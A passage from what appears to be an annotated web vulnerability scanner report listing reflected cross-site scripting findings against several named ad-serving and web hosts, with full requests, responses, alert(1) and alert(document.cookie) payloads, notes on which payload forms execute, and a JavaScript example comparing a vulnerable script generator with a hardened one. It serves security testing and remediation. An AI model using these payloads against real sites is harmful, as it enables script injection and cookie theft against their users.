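    };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: '/**/' + callback + '(' + scriptSafeJson(data) + ');',
  };
}
```

With the 4.5 payload `_ate.ad.hpr12318<script>alert(1)</script>93554ce024a`, `jsonpUnchecked` reproduces the response body shown above, while `jsonpChecked` returns a 400 whose body contains none of the input; with the legitimate `_ate.ad.hpr` it returns `/**/_ate.ad.hpr({"urls":[]});`. The identifier pattern is the control that matters; nosniff and the comment prefix narrow what a browser or plugin can make of the response if some other path still reflects input.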

4.7. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied unencoded into a text/javascript response, inside the double-quoted string passed to __ADXPOSE_DRAIN_QUEUE__. The payload 83bd9<script>alert(1)</script>9fdcd05d786 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

As in 4.1, a <script> tag inside a JavaScript string literal does not execute, and the request did not test a quote or backslash that would terminate the literal. This confirms unencoded reflection in script context; execution is not demonstrated.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.martindale.com%2Fall%2Fc-england%2Fall-lawyers.htm%3Fn%3D4294962592%26dv%3Dadd%7CCity%5EBirmingham%26c%3DD&uid=ZC45X9Axu6NOUFfX_32161183bd9<script>alert(1)</script>9fdcd05d786&xy=0%2C0&wh=160%2C600&vchannel=76289&cid=151354&iad=1303088636437-24098835326731204&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=51F08BBF89654C7FA20B932E6BA89916; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Mon, 18 Apr 2011 01:03:44 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_32161183bd9<script>alert(1)</script>9fdcd05d786");

4.8. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied unencoded into the queryParams JSON string of an application/x-javascript response. The payload 34b29<img%20src%3da%20onerror%3dalert(1)>a50142f4ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34b29<img src=a onerror=alert(1)>a50142f4ff4 in the application's response.

The PoC uses an event handler on an <img> tag rather than a <script> tag. In the context shown the tag sits inside a JavaScript string literal and is inert; the onerror handler runs only if the SearchBox code later writes queryParams into the document as HTML, which this excerpt does not show. Unencoded reflection is demonstrated; execution is not.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&34b29<img%20src%3da%20onerror%3dalert(1)>a50142f4ff4=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc308589?9fba4%22%3E%3Ca%3Ea6f4837759d=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: c27d9e150535db3d74b0587f816e3483
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Tue, 19 Apr 2011 01:50:02 GMT
Date: Mon, 18 Apr 2011 13:50:02 GMT
Connection: close
Content-Length: 12915


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&34b29<img src=a onerror=alert(1)>a50142f4ff4=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

4.9. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ac1e'%3balert(1)//347fd78e021 was submitted in the mpck parameter. This input was echoed as 2ac1e';alert(1)//347fd78e021 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two caveats apply to this and the other img.mediaplex.com findings: a script file does not execute when opened directly, so an attacker needs a page that loads 300x250_Patch.js or 728x90_Patch.js with the crafted parameters; and because the injected // comments out the remainder of the line, the script only runs if what followed on that line (elided here) still parses without it.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D333120119182ac1e'%3balert(1)//347fd78e021&mpt=33312011918&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:25 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 3828
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-124632-26209-0?mpt=333120119182ac1e';alert(1)//347fd78e021" target="_blank">
...[SNIP]...

4.10. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffb5"-alert(1)-"b3233047e0a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The expression form "-alert(1)-" is the right payload for this position: it leaves encodeURIComponent("..."-alert(1)-"...") syntactically valid, so alert(1) runs as soon as a page loads the script.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D333120119183ffb5"-alert(1)-"b3233047e0a&mpt=33312011918&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:23 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 3822
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D333120119183ffb5"-alert(1)-"b3233047e0a");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D333120119183ffb5"-alert(1)-"b3233047e0a");
mpck
...[SNIP]...

4.11. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36dda'%3balert(1)//0e6f7d676f4 was submitted in the mpvc parameter. This input was echoed as 36dda';alert(1)//0e6f7d676f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 4.9, the single-quote break-out is confirmed, but the // comments out the rest of the line, so whether the surrounding script still parses depends on the elided continuation.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D33312011918&mpt=33312011918&mpvc=36dda'%3balert(1)//0e6f7d676f4 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:45 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 3824
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="36dda';alert(1)//0e6f7d676f4http://altfarm.mediaplex.com/ad/ck/16228-124632-26209-0?mpt=33312011918" target="_blank">
...[SNIP]...

4.12. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b279"%3balert(1)//a2e6ef3a614 was submitted in the mpvc parameter. This input was echoed as 9b279";alert(1)//a2e6ef3a614 in the application's response.

The break-out is confirmed, but the payload shown does not execute in this position: after ";alert(1)// the // comments out the closing ); of encodeURIComponent(, leaving an unclosed call, and a JavaScript engine rejects the whole file with a syntax error before running any of it. The form that does execute inside the call is the expression payload "-alert(1)-" used in 4.10.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-0%3Fmpt%3D33312011918&mpt=33312011918&mpvc=9b279"%3balert(1)//a2e6ef3a614 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:43 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 3824
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("9b279";alert(1)//a2e6ef3a614");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("9b279";alert(1)//a2e6ef3a614");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("9b279"%3balert(1)//a2e6ef3a614");
...[SNIP]...

4.13. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3a38"-alert(1)-"f6d1348eaec was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 4.10, the "-alert(1)-" form keeps the encodeURIComponent(...) call valid, so this one runs once a page loads the script.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918e3a38"-alert(1)-"f6d1348eaec&mpt=33312011918&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:23 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 3812
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918e3a38"-alert(1)-"f6d1348eaec");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918e3a38"-alert(1)-"f6d1348eaec");
mpck
...[SNIP]...

4.14. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a08cc'%3balert(1)//b46291c3ea9 was submitted in the mpck parameter. This input was echoed as a08cc';alert(1)//b46291c3ea9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The caveats given in 4.9 (script-include only; the // must not leave the rest of the line unparseable) apply here too.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918a08cc'%3balert(1)//b46291c3ea9&mpt=33312011918&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:25 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 3818
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-124632-26209-1?mpt=33312011918a08cc';alert(1)//b46291c3ea9" target="_blank">
...[SNIP]...

4.15. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e955d"%3balert(1)//9292326dcad was submitted in the mpvc parameter. This input was echoed as e955d";alert(1)//9292326dcad in the application's response.

As in 4.12: ";alert(1)// leaves encodeURIComponent( unclosed on the line, so this exact payload produces a syntax error rather than running; the "-alert(1)-" form from 4.13 executes in this position.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918&mpt=33312011918&mpvc=e955d"%3balert(1)//9292326dcad HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:43 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 3814
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("e955d";alert(1)//9292326dcad");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("e955d";alert(1)//9292326dcad");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("e955d"%3balert(1)//9292326dcad");
...[SNIP]...

4.16. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd90'%3balert(1)//80b9ab1df8b was submitted in the mpvc parameter. This input was echoed as 6dd90';alert(1)//80b9ab1df8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The caveats given in 4.11 apply: the quote escape is confirmed, and the // leaves the rest of the line to the elided continuation.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
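
The remediation note above applies to all eight img.mediaplex.com findings (4.9 to 4.16), so one added example serves them: the string-concatenation shape seen in the 300x250_Patch.js and 728x90_Patch.js responses beside a generator that serialises the value as a JavaScript string literal, both run against the report's own payloads with a counting stand-in for alert. This is not code from img.mediaplex.com; the generator names are assumptions, and the `new Function` harness is for demonstration, not a security boundary.

```javascript
// Added example, not code from img.mediaplex.com: the concatenation shape
// observed in the Patch.js responses beside a hardened generator, executed
// against the report's payloads. Names are assumptions; the harness is a
// demonstration aid only.

// Vulnerable: the value is spliced between the quotes, exactly as observed.
function buildVulnerable(mpvc) {
  return 'var mpvclick = encodeURIComponent("' + mpvc + '");';
}

// Hardened: JSON.stringify emits a correctly delimited and escaped string
// literal; the extra replacements cover sequences JSON permits that still
// break a script inlined in HTML (</ closes <script>, U+2028/2029 end a line).
function toJsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function buildHardened(mpvc) {
  return 'var mpvclick = encodeURIComponent(' + toJsStringLiteral(mpvc) + ');';
}

// Executes generated code with alert replaced by a counter. Reports how many
// times alert ran, the value mpvclick ended up with, and the error name if
// the script did not parse or run. The return goes on its own line so an
// injected // cannot comment it out.
function runAndCount(code) {
  let calls = 0;
  const fakeAlert = () => { calls += 1; };
  try {
    const value = new Function('alert', code + '\nreturn mpvclick;')(fakeAlert);
    return { alertCalls: calls, value, error: null };
  } catch (e) {
    return { alertCalls: calls, value: undefined, error: e.name };
  }
}

// Payloads as reflected in 4.10, 4.12 and 4.11 respectively.
const PAYLOAD_EXPRESSION = '3ffb5"-alert(1)-"b3233047e0a';
const PAYLOAD_STATEMENT = '9b279";alert(1)//a2e6ef3a614';
const PAYLOAD_WRONG_QUOTE = "36dda';alert(1)//0e6f7d676f4";

// Runs one payload through both generators.
function compare(payload) {
  return {
    vulnerable: runAndCount(buildVulnerable(payload)),
    hardened: runAndCount(buildHardened(payload)),
  };
}
```

`compare(PAYLOAD_EXPRESSION)` shows the vulnerable generator calling alert once while the hardened one calls it zero times and leaves `mpvclick` equal to the percent-encoded payload. `compare(PAYLOAD_STATEMENT)` shows the point made in 4.12: the vulnerable output is a SyntaxError and alert never runs, because `//` swallowed the `);` that closed the call. `compare(PAYLOAD_WRONG_QUOTE)` shows a single quote doing nothing inside a double-quoted literal, which is why the scanner tries both quote styles per parameter. In all three cases the hardened output round-trips the value unchanged.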

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918&mpt=33312011918&mpvc=6dd90'%3balert(1)//80b9ab1df8b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:45 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 3814
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="6dd90';alert(1)//80b9ab1df8bhttp://altfarm.mediaplex.com/ad/ck/16228-124632-26209-1?mpt=33312011918" target="_blank">
...[SNIP]...

4.17. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c95d2"><script>alert(1)</script>3baa62b01e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?c95d2"><script>alert(1)</script>3baa62b01e2=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Apr 2011 01:51:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&c95d2"><script>alert(1)</script>3baa62b01e2=1" type="text/css" media="all" />
...[SNIP]...

4.18. http://jqueryui.com/themeroller/css/parseTheme.css.php [c95d2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the c95d2 request parameter is copied into the HTML document as plain text between tags. The payload 6f58e<script>alert(1)</script>05175a80001 was submitted in the c95d2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&c95d26f58e<script>alert(1)</script>05175a80001 HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
Referer: http://jqueryui.com/themeroller/?c95d2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3baa62b01e2=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Apr 2011 20:58:15 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 16605


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&c95d26f58e<script>alert(1)</script>05175a80001
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-
...[SNIP]...

4.19. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the ctl request parameter is copied into the HTML document as plain text between tags. The payload f2062<script>alert(1)</script>f22eaa1a584 was submitted in the ctl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

